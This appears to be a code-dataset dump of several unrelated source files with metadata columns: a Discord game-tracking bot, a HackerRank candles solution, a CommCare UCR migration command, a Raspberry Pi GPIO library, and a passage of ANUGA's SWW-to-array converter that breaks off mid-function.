message = await gameChannel.send(embed = e, content = f'{ping}')
await message.add_reaction(emoji="🐿️")
try:
utl.w_pgames(user.id, 'pop')
except KeyError:
pass
games = utl.r_games()
# Writes the game to the Game JSON file
utl.w_games(user.id, [message.id,code,x.strftime("%Y.%m.%d.%H:%M:%S")])
return True
else:
return False
async def pgames(user):
pgames = utl.r_pgames()
code = ''
for i,e in pgames.items():
if i == f'{user.id}':
code = e[1]
return code
async def endgame(user, bot):
# Opens game file to find message ID and game code
games = utl.r_games()
game = False
for i,e in games.items():
if i == f'{user.id}':
game = True
# Gets the message ID and game code
if game == True:
contents = games[f'{user.id}']
messageID = contents[0]
code = contents[1]
# Removes game from games.json
utl.w_games(user.id, 'pop')
# Gets the message from the ID
gChannel = utl.settings()['GAME_CHANNEL']
channel = bot.get_channel(gChannel)
message = await channel.fetch_message(int(messageID))
# Edits the embed to say the game has ended
e = discord.Embed(colour=discord.Color.red(),title="*ENDED*",description=f"**{code}**")
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
await message.edit(embed = e, content = '')
return True
else:
return False
| import discord
import datetime
import json
import pickle
import yaml
from discord.ext import commands, tasks
from discord import Embed, Member
from datetime import timedelta
from itertools import cycle
import things.UTILITIES as utl
async def startgame(user, code, guild, bot):
x = datetime.datetime.now()
games = utl.r_games()
game = False
# looks to see if this player already has a game
for i,e in games.items():
if i == f'{user.id}':
game = True
break
if game == False:
gChannel = utl.settings()['GAME_CHANNEL']
gameChannel = bot.get_channel(gChannel)
currentPing = x
ping = ''
if utl.ping() == True:
ping = guild.get_role(utl.settings()['SQUIRREL_ROLE']).mention
# Sends game code
e = discord.Embed(colour=discord.Color.orange(),title=f"**{code}**",description='React with 🐿️ if you joined')
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
message = await gameChannel.send(embed = e, content = f'{ping}')
await message.add_reaction(emoji="🐿️")
try:
utl.w_pgames(user.id, 'pop')
except KeyError:
pass
games = utl.r_games()
# Writes the game to the Game JSON file
utl.w_games(user.id, [message.id,code,x.strftime("%Y.%m.%d.%H:%M:%S")])
return True
else:
return False
async def pgames(user):
pgames = utl.r_pgames()
code = ''
for i,e in pgames.items():
if i == f'{user.id}':
code = e[1]
return code
async def endgame(user, bot):
# Opens game file to find message ID and game code
games = utl.r_games()
game = False
for i,e in games.items():
if i == f'{user.id}':
game = True
# Gets the message ID and game code
if game == True:
contents = games[f'{user.id}']
messageID = contents[0]
code = contents[1]
# Removes game from games.json
utl.w_games(user.id, 'pop')
# Gets the message from the ID
gChannel = utl.settings()['GAME_CHANNEL']
channel = bot.get_channel(gChannel)
message = await channel.fetch_message(int(messageID))
# Edits the embed to say the game has ended
e = discord.Embed(colour=discord.Color.red(),title="*ENDED*",description=f"**{code}**")
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
await message.edit(embed = e, content = '')
return True
else:
return False
| en | 0.830078 | # looks to see if this player already has a game # Sends game code #{user.discriminator}',icon_url=f'{user.avatar_url}') # Writes the game to the Game JSON file # Opens game file to find message ID and game code # Gets the message ID and game code # Removes game from games.json # Gets the message from the ID # Edits the embed to say the game has ended #{user.discriminator}',icon_url=f'{user.avatar_url}') | 2.729856 | 3 |
Data Structures and Algorithms/HackerRank Algo Solutions/EASY PROBLEMS/BirthdayCakeCandles.py | akkik04/Python-DataStructures-and-Algorithms | 1 | 6632458 | <filename>Data Structures and Algorithms/HackerRank Algo Solutions/EASY PROBLEMS/BirthdayCakeCandles.py
# BIRTHDAY CAKE CANDLES HACKER-RANK SOLUTION:
# function receiving an argument as the candles array.
def birthdayCakeCandles(candles):
# declaring a variable to store the length of the candle array.
x = len(candles)
# declaring variables for the count and the maximum number.
maximum_number = 0
counter = 0
# for-loop to iterate for the length of the candle array.
for i in range (x):
# nested if-statement to determine if the count should be increased.
if candles[i] > maximum_number:
maximum_number = candles[i]
counter = 1
elif candles[i] == maximum_number:
counter+= 1
# returning count for the most common index.
return candles.count(max(candles))
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
print(birthdayCakeCandles(candles)) | <filename>Data Structures and Algorithms/HackerRank Algo Solutions/EASY PROBLEMS/BirthdayCakeCandles.py
# BIRTHDAY CAKE CANDLES HACKER-RANK SOLUTION:
# function receiving an argument as the candles array.
def birthdayCakeCandles(candles):
# declaring a variable to store the length of the candle array.
x = len(candles)
# declaring variables for the count and the maximum number.
maximum_number = 0
counter = 0
# for-loop to iterate for the length of the candle array.
for i in range (x):
# nested if-statement to determine if the count should be increased.
if candles[i] > maximum_number:
maximum_number = candles[i]
counter = 1
elif candles[i] == maximum_number:
counter+= 1
# returning count for the most common index.
return candles.count(max(candles))
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
print(birthdayCakeCandles(candles)) | en | 0.793482 | # BIRTHDAY CAKE CANDLES HACKER-RANK SOLUTION: # function receiving an argument as the candles array. # declaring a variable to store the length of the candle array. # declaring variables for the count and the maximum number. # for-loop to iterate for the length of the candle array. # nested if-statement to determine if the count should be increased. # returning count for the most common index. | 4.306523 | 4 |
custom/icds_reports/management/commands/migrate_ucr.py | kkrampa/commcare-hq | 1 | 6632459 | from __future__ import absolute_import, print_function
from __future__ import unicode_literals
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
from django.core.management.base import BaseCommand
from sqlalchemy import select
from corehq.apps.userreports.models import get_datasource_config
from corehq.apps.userreports.util import get_indicator_adapter
class Command(BaseCommand):
help = "Migrate data from one UCR to another"
def add_arguments(self, parser):
parser.add_argument('domain')
parser.add_argument('old_data_source_id')
parser.add_argument('new_data_source_id')
parser.add_argument('--date-column', default='inserted_at')
parser.add_argument('--initiated-by', action='store', required=True, dest='initiated',
help='Who initiated the rebuild')
def handle(self, domain, old_data_source_id, new_data_source_id, **options):
old_config, _ = get_datasource_config(old_data_source_id, domain)
new_config, _ = get_datasource_config(new_data_source_id, domain)
assert old_config.referenced_doc_type == new_config.referenced_doc_type
old_filter = old_config.get_case_type_or_xmlns_filter()
new_filter = new_config.get_case_type_or_xmlns_filter()
assert set(old_filter) == set(new_filter)
old_adapter = get_indicator_adapter(old_config)
new_adapter = get_indicator_adapter(new_config)
old_table = old_adapter.get_table()
new_table = new_adapter.get_table()
assert hasattr(old_table.columns, options['date_column'])
column = getattr(old_table.columns, options['date_column'])
new_adapter.build_table(initiated_by=options['initiated'], source='migrate_ucr')
end_date = date(2016, 1, 1)
query = self.insert_query(old_table, new_table, column, end_date=end_date)
self.run_query(new_adapter, query)
start_date = end_date
end_date = end_date + relativedelta(months=1)
while start_date < date.today():
query = self.insert_query(old_table, new_table, column, start_date, end_date)
self.run_query(new_adapter, query)
start_date += relativedelta(months=1)
end_date += relativedelta(months=1)
query = self.insert_query(old_table, new_table, column, start_date)
self.run_query(new_adapter, query)
def insert_query(self, old_table, new_table, column, start_date=None, end_date=None):
if start_date is None:
where_query = (column < end_date)
elif end_date is None:
where_query = (column >= start_date)
else:
where_query = (column >= start_date) & (column < end_date)
sel = select(old_table.c).where(where_query)
return new_table.insert().from_select(new_table.c, sel)
def run_query(self, adapter, query):
print(query)
print(datetime.utcnow())
with adapter.engine.begin() as connection:
connection.execute(query)
print("query complete")
| from __future__ import absolute_import, print_function
from __future__ import unicode_literals
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
from django.core.management.base import BaseCommand
from sqlalchemy import select
from corehq.apps.userreports.models import get_datasource_config
from corehq.apps.userreports.util import get_indicator_adapter
class Command(BaseCommand):
help = "Migrate data from one UCR to another"
def add_arguments(self, parser):
parser.add_argument('domain')
parser.add_argument('old_data_source_id')
parser.add_argument('new_data_source_id')
parser.add_argument('--date-column', default='inserted_at')
parser.add_argument('--initiated-by', action='store', required=True, dest='initiated',
help='Who initiated the rebuild')
def handle(self, domain, old_data_source_id, new_data_source_id, **options):
old_config, _ = get_datasource_config(old_data_source_id, domain)
new_config, _ = get_datasource_config(new_data_source_id, domain)
assert old_config.referenced_doc_type == new_config.referenced_doc_type
old_filter = old_config.get_case_type_or_xmlns_filter()
new_filter = new_config.get_case_type_or_xmlns_filter()
assert set(old_filter) == set(new_filter)
old_adapter = get_indicator_adapter(old_config)
new_adapter = get_indicator_adapter(new_config)
old_table = old_adapter.get_table()
new_table = new_adapter.get_table()
assert hasattr(old_table.columns, options['date_column'])
column = getattr(old_table.columns, options['date_column'])
new_adapter.build_table(initiated_by=options['initiated'], source='migrate_ucr')
end_date = date(2016, 1, 1)
query = self.insert_query(old_table, new_table, column, end_date=end_date)
self.run_query(new_adapter, query)
start_date = end_date
end_date = end_date + relativedelta(months=1)
while start_date < date.today():
query = self.insert_query(old_table, new_table, column, start_date, end_date)
self.run_query(new_adapter, query)
start_date += relativedelta(months=1)
end_date += relativedelta(months=1)
query = self.insert_query(old_table, new_table, column, start_date)
self.run_query(new_adapter, query)
def insert_query(self, old_table, new_table, column, start_date=None, end_date=None):
if start_date is None:
where_query = (column < end_date)
elif end_date is None:
where_query = (column >= start_date)
else:
where_query = (column >= start_date) & (column < end_date)
sel = select(old_table.c).where(where_query)
return new_table.insert().from_select(new_table.c, sel)
def run_query(self, adapter, query):
print(query)
print(datetime.utcnow())
with adapter.engine.begin() as connection:
connection.execute(query)
print("query complete")
| none | 1 | 1.849103 | 2 |
|
naive.py | LarsAstrom/Hashcode-final-2019 | 0 | 6632460 | import argparse
import random
from collections import defaultdict
from score import parse
# inp is an input file as a single string
# return your output as a string
def solve(seed, inp, log):
# TODO: Solve the problem
random.seed(seed)
ns = parse(inp)
uncomps = [i for i in range(ns.C)]
#cur_comp = 0
comp_files = [[False]*ns.C for _ in range(ns.S)]
repl = defaultdict(list)
nxt_avail_time = [0]*ns.S
MAX_T = max([t.d for t in ns.targets])
cur_comp_on_server = [-1]*ns.S
out = []
def is_compable(comp,s):
for dep in comp.deps:
if not comp_files[s][dep]: return False
return True
for t in range(MAX_T+1):
print 'Cur time: {}, Max time: {}, Uncompiled files {}'.format(t,MAX_T,len(uncomps))
for rep in repl[t]:
for s in range(ns.S):
comp_files[s][rep] = True
for s in range(ns.S):
if t<nxt_avail_time[s]: continue
if t==nxt_avail_time[s]: comp_files[s][cur_comp_on_server[s]] = True
for comp in uncomps:
if is_compable(ns.compilable[comp],s):
uncomps.remove(comp)
comp = ns.compilable[comp]
nxt_avail_time[s] = t + comp.c
repl[t+comp.c+comp.r].append(comp.i)
out.append((comp.name,s))
break
print len(out)
out2 = [str(len(out))] + [' '.join(map(str,o)) for o in out]
return '\n'.join(out2)
| import argparse
import random
from collections import defaultdict
from score import parse
# inp is an input file as a single string
# return your output as a string
def solve(seed, inp, log):
# TODO: Solve the problem
random.seed(seed)
ns = parse(inp)
uncomps = [i for i in range(ns.C)]
#cur_comp = 0
comp_files = [[False]*ns.C for _ in range(ns.S)]
repl = defaultdict(list)
nxt_avail_time = [0]*ns.S
MAX_T = max([t.d for t in ns.targets])
cur_comp_on_server = [-1]*ns.S
out = []
def is_compable(comp,s):
for dep in comp.deps:
if not comp_files[s][dep]: return False
return True
for t in range(MAX_T+1):
print 'Cur time: {}, Max time: {}, Uncompiled files {}'.format(t,MAX_T,len(uncomps))
for rep in repl[t]:
for s in range(ns.S):
comp_files[s][rep] = True
for s in range(ns.S):
if t<nxt_avail_time[s]: continue
if t==nxt_avail_time[s]: comp_files[s][cur_comp_on_server[s]] = True
for comp in uncomps:
if is_compable(ns.compilable[comp],s):
uncomps.remove(comp)
comp = ns.compilable[comp]
nxt_avail_time[s] = t + comp.c
repl[t+comp.c+comp.r].append(comp.i)
out.append((comp.name,s))
break
print len(out)
out2 = [str(len(out))] + [' '.join(map(str,o)) for o in out]
return '\n'.join(out2)
| en | 0.830088 | # inp is an input file as a single string # return your output as a string # TODO: Solve the problem #cur_comp = 0 | 2.825264 | 3 |
All_Source_Code/CleanseData/CleanseData_3.py | APMonitor/pds | 11 | 6632461 | <filename>All_Source_Code/CleanseData/CleanseData_3.py
result = z.dropna() | <filename>All_Source_Code/CleanseData/CleanseData_3.py
result = z.dropna() | none | 1 | 1.140392 | 1 |
|
agent_simple_cartpole.py | halcyoona/reinforcement-learning-demo | 0 | 6632462 | import gym
import random
class Agent():
def __init__(self, env):
self.action_size = env.action_space.n
print("Action Size: ", self.action_size)
def get_action(self, state):
# action = random.choice(range(self.action_size))
pole_angles = state[2]
action = 0 if pole_angles < 0 else 1
return action
if __name__ == "__main__":
game_name = "CartPole-v1"
env = gym.make(game_name)
agent = Agent(env)
state = env.reset()
for _ in range(200):
# action = env.action_space.sample()
action = agent.get_action(state)
state, reward, done, info = env.step(action)
env.render() | import gym
import random
class Agent():
def __init__(self, env):
self.action_size = env.action_space.n
print("Action Size: ", self.action_size)
def get_action(self, state):
# action = random.choice(range(self.action_size))
pole_angles = state[2]
action = 0 if pole_angles < 0 else 1
return action
if __name__ == "__main__":
game_name = "CartPole-v1"
env = gym.make(game_name)
agent = Agent(env)
state = env.reset()
for _ in range(200):
# action = env.action_space.sample()
action = agent.get_action(state)
state, reward, done, info = env.step(action)
env.render() | en | 0.36326 | # action = random.choice(range(self.action_size)) # action = env.action_space.sample() | 3.208847 | 3 |
NFC_Reader/quick2wire/gpio.py | lleon95/NFC_Points_Service | 46 | 6632463 | """A convenient API to access the GPIO pins of the Raspberry Pi.
"""
import os
import subprocess
from contextlib import contextmanager
from quick2wire.board_revision import revision
from quick2wire.selector import EDGE
def gpio_admin(subcommand, pin, pull=None):
if pull:
subprocess.check_call(["gpio-admin", subcommand, str(pin), pull])
else:
subprocess.check_call(["gpio-admin", subcommand, str(pin)])
Out = "out"
In = "in"
Rising = "rising"
Falling = "falling"
Both = "both"
PullDown = "pulldown"
PullUp = "pullup"
class PinAPI(object):
def __init__(self, bank, index):
self._bank = bank
self._index = index
@property
def index(self):
return self._index
@property
def bank(self):
return self._bank
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
value = property(lambda p: p.get(),
lambda p,v: p.set(v),
doc="""The value of the pin: 1 if the pin is high, 0 if the pin is low.""")
class PinBankAPI(object):
def __getitem__(self, n):
if 0 < n < len(self):
raise ValueError("no pin index {n} out of range", n=n)
return self.pin(n)
def write(self):
pass
def read(self):
pass
class Pin(PinAPI):
"""Controls a GPIO pin."""
__trigger__ = EDGE
def __init__(self, bank, index, soc_pin_number, direction=In, interrupt=None, pull=None):
"""Creates a pin
Parameters:
user_pin_number -- the identity of the pin used to create the derived class.
soc_pin_number -- the pin on the header to control, identified by the SoC pin number.
direction -- (optional) the direction of the pin, either In or Out.
interrupt -- (optional)
pull -- (optional)
Raises:
IOError -- could not export the pin (if direction is given)
"""
super(Pin,self).__init__(None, index)
self._soc_pin_number = soc_pin_number
self._file = None
self._direction = direction
self._interrupt = interrupt
self._pull = pull
@property
def soc_pin_number(self):
return self._soc_pin_number
def open(self):
gpio_admin("export", self.soc_pin_number, self._pull)
self._file = open(self._pin_path("value"), "r+")
self._write("direction", self._direction)
if self._direction == In:
self._write("edge", self._interrupt if self._interrupt is not None else "none")
def close(self):
if not self.closed:
if self.direction == Out:
self.value = 0
self._file.close()
self._file = None
self._write("direction", In)
self._write("edge", "none")
gpio_admin("unexport", self.soc_pin_number)
def get(self):
"""The current value of the pin: 1 if the pin is high or 0 if the pin is low.
The value can only be set if the pin's direction is Out.
Raises:
IOError -- could not read or write the pin's value.
"""
self._check_open()
self._file.seek(0)
v = self._file.read()
return int(v) if v else 0
def set(self, new_value):
self._check_open()
if self._direction != Out:
raise ValueError("not an output pin")
self._file.seek(0)
self._file.write(str(int(new_value)))
self._file.flush()
@property
def direction(self):
"""The direction of the pin: either In or Out.
The value of the pin can only be set if its direction is Out.
Raises:
IOError -- could not set the pin's direction.
"""
return self._direction
@direction.setter
def direction(self, new_value):
self._write("direction", new_value)
self._direction = new_value
@property
def interrupt(self):
"""The interrupt property specifies what event (if any) will raise an interrupt.
One of:
Rising -- voltage changing from low to high
Falling -- voltage changing from high to low
Both -- voltage changing in either direction
None -- interrupts are not raised
Raises:
IOError -- could not read or set the pin's interrupt trigger
"""
return self._interrupt
@interrupt.setter
def interrupt(self, new_value):
self._write("edge", new_value)
self._interrupt = new_value
@property
def pull(self):
return self._pull
def fileno(self):
"""Return the underlying file descriptor. Useful for select, epoll, etc."""
return self._file.fileno()
@property
def closed(self):
"""Returns if this pin is closed"""
return self._file is None or self._file.closed
def _check_open(self):
if self.closed:
raise IOError(str(self) + " is closed")
def _write(self, filename, value):
with open(self._pin_path(filename), "w+") as f:
f.write(value)
def _pin_path(self, filename=""):
return "/sys/devices/virtual/gpio/gpio%i/%s" % (self.soc_pin_number, filename)
def __repr__(self):
return self.__module__ + "." + str(self)
def __str__(self):
return "{type}({index})".format(
type=self.__class__.__name__,
index=self.index)
class PinBank(PinBankAPI):
def __init__(self, index_to_soc_fn, count=None):
super(PinBank,self).__init__()
self._index_to_soc = index_to_soc_fn
self._count = count
def pin(self, index, *args, **kwargs):
return Pin(self, index, self._index_to_soc(index), *args, **kwargs)
@property
def has_len(self):
return self._count is not None
def __len__(self):
if self._count is not None:
return self._count
else:
raise TypeError(self.__class__.__name__ + " has no len")
BUTTON = 0
LED = 1
SPI_INTERRUPT = 6
I2C_INTERRUPT = 7
_pi_revision = revision()
if _pi_revision == 0:
# Not running on the Raspberry Pi, so define no-op pin banks
pins = PinBank(lambda p: p)
pi_broadcom_soc = pins
pi_header_1 = pins
else:
def by_revision(d):
return d[_pi_revision]
# Maps header pin numbers to SoC GPIO numbers
# See http://elinux.org/RPi_Low-level_peripherals
#
# Note: - header pins are numbered from 1, SoC GPIO from zero
# - the Pi documentation identifies some header pins as GPIO0,
# GPIO1, etc., but these are not the same as the SoC GPIO
# numbers.
_pi_header_1_pins = {
3: by_revision({1:0, 2:2}),
5: by_revision({1:1, 2:3}),
7: 4,
8: 14,
10: 15,
11: 17,
12: 18,
13: by_revision({1:21, 2:27}),
15: 22,
16: 23,
18: 24,
19: 10,
21: 9,
22: 25,
23: 11,
24: 8,
26: 7
}
_pi_gpio_pins = [_pi_header_1_pins[i] for i in [11, 12, 13, 15, 16, 18, 22, 7]]
def lookup(pin_mapping, i):
try:
if i >= 0:
return pin_mapping[i]
except LookupError:
pass
raise IndexError(str(i) + " is not a valid pin index")
def map_with(pin_mapping):
return lambda i: lookup(pin_mapping,i)
pi_broadcom_soc = PinBank(lambda p: p)
pi_header_1 = PinBank(map_with(_pi_header_1_pins))
pins = PinBank(map_with(_pi_gpio_pins), len(_pi_gpio_pins))
| """A convenient API to access the GPIO pins of the Raspberry Pi.
"""
import os
import subprocess
from contextlib import contextmanager
from quick2wire.board_revision import revision
from quick2wire.selector import EDGE
def gpio_admin(subcommand, pin, pull=None):
if pull:
subprocess.check_call(["gpio-admin", subcommand, str(pin), pull])
else:
subprocess.check_call(["gpio-admin", subcommand, str(pin)])
Out = "out"
In = "in"
Rising = "rising"
Falling = "falling"
Both = "both"
PullDown = "pulldown"
PullUp = "pullup"
class PinAPI(object):
def __init__(self, bank, index):
self._bank = bank
self._index = index
@property
def index(self):
return self._index
@property
def bank(self):
return self._bank
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
value = property(lambda p: p.get(),
lambda p,v: p.set(v),
doc="""The value of the pin: 1 if the pin is high, 0 if the pin is low.""")
class PinBankAPI(object):
def __getitem__(self, n):
if 0 < n < len(self):
raise ValueError("no pin index {n} out of range", n=n)
return self.pin(n)
def write(self):
pass
def read(self):
pass
class Pin(PinAPI):
"""Controls a GPIO pin."""
__trigger__ = EDGE
def __init__(self, bank, index, soc_pin_number, direction=In, interrupt=None, pull=None):
"""Creates a pin
Parameters:
user_pin_number -- the identity of the pin used to create the derived class.
soc_pin_number -- the pin on the header to control, identified by the SoC pin number.
direction -- (optional) the direction of the pin, either In or Out.
interrupt -- (optional)
pull -- (optional)
Raises:
IOError -- could not export the pin (if direction is given)
"""
super(Pin,self).__init__(None, index)
self._soc_pin_number = soc_pin_number
self._file = None
self._direction = direction
self._interrupt = interrupt
self._pull = pull
@property
def soc_pin_number(self):
return self._soc_pin_number
def open(self):
gpio_admin("export", self.soc_pin_number, self._pull)
self._file = open(self._pin_path("value"), "r+")
self._write("direction", self._direction)
if self._direction == In:
self._write("edge", self._interrupt if self._interrupt is not None else "none")
def close(self):
if not self.closed:
if self.direction == Out:
self.value = 0
self._file.close()
self._file = None
self._write("direction", In)
self._write("edge", "none")
gpio_admin("unexport", self.soc_pin_number)
def get(self):
"""The current value of the pin: 1 if the pin is high or 0 if the pin is low.
The value can only be set if the pin's direction is Out.
Raises:
IOError -- could not read or write the pin's value.
"""
self._check_open()
self._file.seek(0)
v = self._file.read()
return int(v) if v else 0
def set(self, new_value):
self._check_open()
if self._direction != Out:
raise ValueError("not an output pin")
self._file.seek(0)
self._file.write(str(int(new_value)))
self._file.flush()
@property
def direction(self):
"""The direction of the pin: either In or Out.
The value of the pin can only be set if its direction is Out.
Raises:
IOError -- could not set the pin's direction.
"""
return self._direction
@direction.setter
def direction(self, new_value):
self._write("direction", new_value)
self._direction = new_value
@property
def interrupt(self):
"""The interrupt property specifies what event (if any) will raise an interrupt.
One of:
Rising -- voltage changing from low to high
Falling -- voltage changing from high to low
Both -- voltage changing in either direction
None -- interrupts are not raised
Raises:
IOError -- could not read or set the pin's interrupt trigger
"""
return self._interrupt
@interrupt.setter
def interrupt(self, new_value):
self._write("edge", new_value)
self._interrupt = new_value
@property
def pull(self):
return self._pull
def fileno(self):
"""Return the underlying file descriptor. Useful for select, epoll, etc."""
return self._file.fileno()
@property
def closed(self):
"""Returns if this pin is closed"""
return self._file is None or self._file.closed
def _check_open(self):
if self.closed:
raise IOError(str(self) + " is closed")
def _write(self, filename, value):
with open(self._pin_path(filename), "w+") as f:
f.write(value)
def _pin_path(self, filename=""):
return "/sys/devices/virtual/gpio/gpio%i/%s" % (self.soc_pin_number, filename)
def __repr__(self):
return self.__module__ + "." + str(self)
def __str__(self):
return "{type}({index})".format(
type=self.__class__.__name__,
index=self.index)
class PinBank(PinBankAPI):
def __init__(self, index_to_soc_fn, count=None):
super(PinBank,self).__init__()
self._index_to_soc = index_to_soc_fn
self._count = count
def pin(self, index, *args, **kwargs):
return Pin(self, index, self._index_to_soc(index), *args, **kwargs)
@property
def has_len(self):
return self._count is not None
def __len__(self):
if self._count is not None:
return self._count
else:
raise TypeError(self.__class__.__name__ + " has no len")
BUTTON = 0
LED = 1
SPI_INTERRUPT = 6
I2C_INTERRUPT = 7
_pi_revision = revision()
if _pi_revision == 0:
# Not running on the Raspberry Pi, so define no-op pin banks
pins = PinBank(lambda p: p)
pi_broadcom_soc = pins
pi_header_1 = pins
else:
def by_revision(d):
return d[_pi_revision]
# Maps header pin numbers to SoC GPIO numbers
# See http://elinux.org/RPi_Low-level_peripherals
#
# Note: - header pins are numbered from 1, SoC GPIO from zero
# - the Pi documentation identifies some header pins as GPIO0,
# GPIO1, etc., but these are not the same as the SoC GPIO
# numbers.
_pi_header_1_pins = {
3: by_revision({1:0, 2:2}),
5: by_revision({1:1, 2:3}),
7: 4,
8: 14,
10: 15,
11: 17,
12: 18,
13: by_revision({1:21, 2:27}),
15: 22,
16: 23,
18: 24,
19: 10,
21: 9,
22: 25,
23: 11,
24: 8,
26: 7
}
_pi_gpio_pins = [_pi_header_1_pins[i] for i in [11, 12, 13, 15, 16, 18, 22, 7]]
def lookup(pin_mapping, i):
try:
if i >= 0:
return pin_mapping[i]
except LookupError:
pass
raise IndexError(str(i) + " is not a valid pin index")
def map_with(pin_mapping):
return lambda i: lookup(pin_mapping,i)
pi_broadcom_soc = PinBank(lambda p: p)
pi_header_1 = PinBank(map_with(_pi_header_1_pins))
pins = PinBank(map_with(_pi_gpio_pins), len(_pi_gpio_pins))
| en | 0.789349 | A convenient API to access the GPIO pins of the Raspberry Pi. The value of the pin: 1 if the pin is high, 0 if the pin is low. Controls a GPIO pin. Creates a pin Parameters: user_pin_number -- the identity of the pin used to create the derived class. soc_pin_number -- the pin on the header to control, identified by the SoC pin number. direction -- (optional) the direction of the pin, either In or Out. interrupt -- (optional) pull -- (optional) Raises: IOError -- could not export the pin (if direction is given) The current value of the pin: 1 if the pin is high or 0 if the pin is low. The value can only be set if the pin's direction is Out. Raises: IOError -- could not read or write the pin's value. The direction of the pin: either In or Out. The value of the pin can only be set if its direction is Out. Raises: IOError -- could not set the pin's direction. The interrupt property specifies what event (if any) will raise an interrupt. One of: Rising -- voltage changing from low to high Falling -- voltage changing from high to low Both -- voltage changing in either direction None -- interrupts are not raised Raises: IOError -- could not read or set the pin's interrupt trigger Return the underlying file descriptor. Useful for select, epoll, etc. Returns if this pin is closed # Not running on the Raspberry Pi, so define no-op pin banks # Maps header pin numbers to SoC GPIO numbers # See http://elinux.org/RPi_Low-level_peripherals # # Note: - header pins are numbered from 1, SoC GPIO from zero # - the Pi documentation identifies some header pins as GPIO0, # GPIO1, etc., but these are not the same as the SoC GPIO # numbers. | 3.588705 | 4 |
anuga/file_conversion/sww2array.py | GeoscienceAustralia/anuga_core | 136 | 6632464 | <gh_stars>100-1000
"""
Module to convert SWW to DEM files.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# external modules
from builtins import str
from builtins import range
from past.utils import old_div
from future.utils import raise_
import os
import numpy as num
# ANUGA modules
from anuga.abstract_2d_finite_volumes.util import remove_lone_verts
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.utilities.system_tools import get_vars_in_expression
import anuga.utilities.log as log
from anuga.utilities.file_utils import get_all_swwfiles
######
# formula mappings
######
quantity_formula = {'momentum':'(xmomentum**2 + ymomentum**2)**0.5',
'depth':'stage-elevation',
'speed': \
'(xmomentum**2 + ymomentum**2)**0.5/(stage-elevation+1.e-6/(stage-elevation))'}
# Default block size for sww2dem()
DEFAULT_BLOCK_SIZE = 100000
def sww2array(name_in,
quantity=None, # defaults to elevation
reduction=None,
cellsize=10,
number_of_decimal_places=None,
NODATA_value=-9999.0,
easting_min=None,
easting_max=None,
northing_min=None,
northing_max=None,
verbose=False,
origin=None,
datum='WGS84',
block_size=None):
"""Read SWW file and convert to a numpy array (can be stored to a png file later)
The parameter quantity must be the name of an existing quantity or
an expression involving existing quantities. The default is
'elevation'. Quantity is not a list of quantities.
If reduction is given and it's an index, sww2array will output the quantity at that time-step.
If reduction is given and it's a built in function (eg max, min, mean), then that
function is used to reduce the quantity over all time-steps. If reduction is not given,
reduction is set to "max" by default.
datum
block_size - sets the number of slices along the non-time axis to
process in one block.
"""
import sys
import types
from anuga.geometry.polygon import inside_polygon, outside_polygon
from anuga.abstract_2d_finite_volumes.util import \
apply_expression_to_dictionary
basename_in, in_ext = os.path.splitext(name_in)
if in_ext != '.sww':
raise IOError('Input format for %s must be .sww' % name_in)
false_easting = 500000
false_northing = 10000000
if quantity is None:
quantity = 'elevation'
if reduction is None:
reduction = max
if quantity in quantity_formula:
quantity = quantity_formula[quantity]
if number_of_decimal_places is None:
number_of_decimal_places = 3
if block_size is None:
block_size = DEFAULT_BLOCK_SIZE
assert(isinstance(block_size, (int, int, float)))
# Read sww file
if verbose:
log.critical('Reading from %s' % name_in)
from anuga.file.netcdf import NetCDFFile
fid = NetCDFFile(name_in)
#Get extent and reference
x = num.array(fid.variables['x'], num.float)
y = num.array(fid.variables['y'], num.float)
volumes = num.array(fid.variables['volumes'], num.int)
if type(reduction) is not types.BuiltinFunctionType:
times = fid.variables['time'][reduction]
else:
times = fid.variables['time'][:]
number_of_timesteps = fid.dimensions['number_of_timesteps']
number_of_points = fid.dimensions['number_of_points']
if origin is None:
# Get geo_reference
# sww files don't have to have a geo_ref
try:
geo_reference = Geo_reference(NetCDFObject=fid)
except AttributeError as e:
geo_reference = Geo_reference() # Default georef object
xllcorner = geo_reference.get_xllcorner()
yllcorner = geo_reference.get_yllcorner()
zone = geo_reference.get_zone()
else:
zone = origin[0]
xllcorner = origin[1]
yllcorner = origin[2]
# FIXME: Refactor using code from Interpolation_function.statistics
# (in interpolate.py)
# Something like print swwstats(swwname)
if verbose:
log.critical('------------------------------------------------')
log.critical('Statistics of SWW file:')
log.critical(' Name: %s' % name_in)
log.critical(' Reference:')
log.critical(' Lower left corner: [%f, %f]' % (xllcorner, yllcorner))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' Time: %f' % times)
else:
log.critical(' Start time: %f' % fid.starttime[0])
log.critical(' Extent:')
log.critical(' x [m] in [%f, %f], len(x) == %d'
%(num.min(x), num.max(x), len(x.flat)))
log.critical(' y [m] in [%f, %f], len(y) == %d'
% (num.min(y), num.max(y), len(y.flat)))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' t [s] = %f, len(t) == %d' % (times, 1))
else:
log.critical(' t [s] in [%f, %f], len(t) == %d'
% (min(times), max(times), len(times)))
log.critical(' Quantities [SI units]:')
# Comment out for reduced memory consumption
for name in ['stage', 'xmomentum', 'ymomentum']:
q = fid.variables[name][:].flatten()
if type(reduction) is not types.BuiltinFunctionType:
q = q[reduction*len(x):(reduction+1)*len(x)]
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
for name in ['elevation']:
q = fid.variables[name][:].flatten()
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
# Get the variables in the supplied expression.
# This may throw a SyntaxError exception.
var_list = get_vars_in_expression(quantity)
# Check that we have the required variables in the SWW file.
missing_vars = []
for name in var_list:
try:
_ = fid.variables[name]
except KeyError:
missing_vars.append(name)
if missing_vars:
msg = ("In expression '%s', variables %s are not in the SWW file '%s'"
% (quantity, str(missing_vars), name_in))
raise_(Exception, msg)
# Create result array and start filling, block by block.
result = num.zeros(number_of_points, num.float)
if verbose:
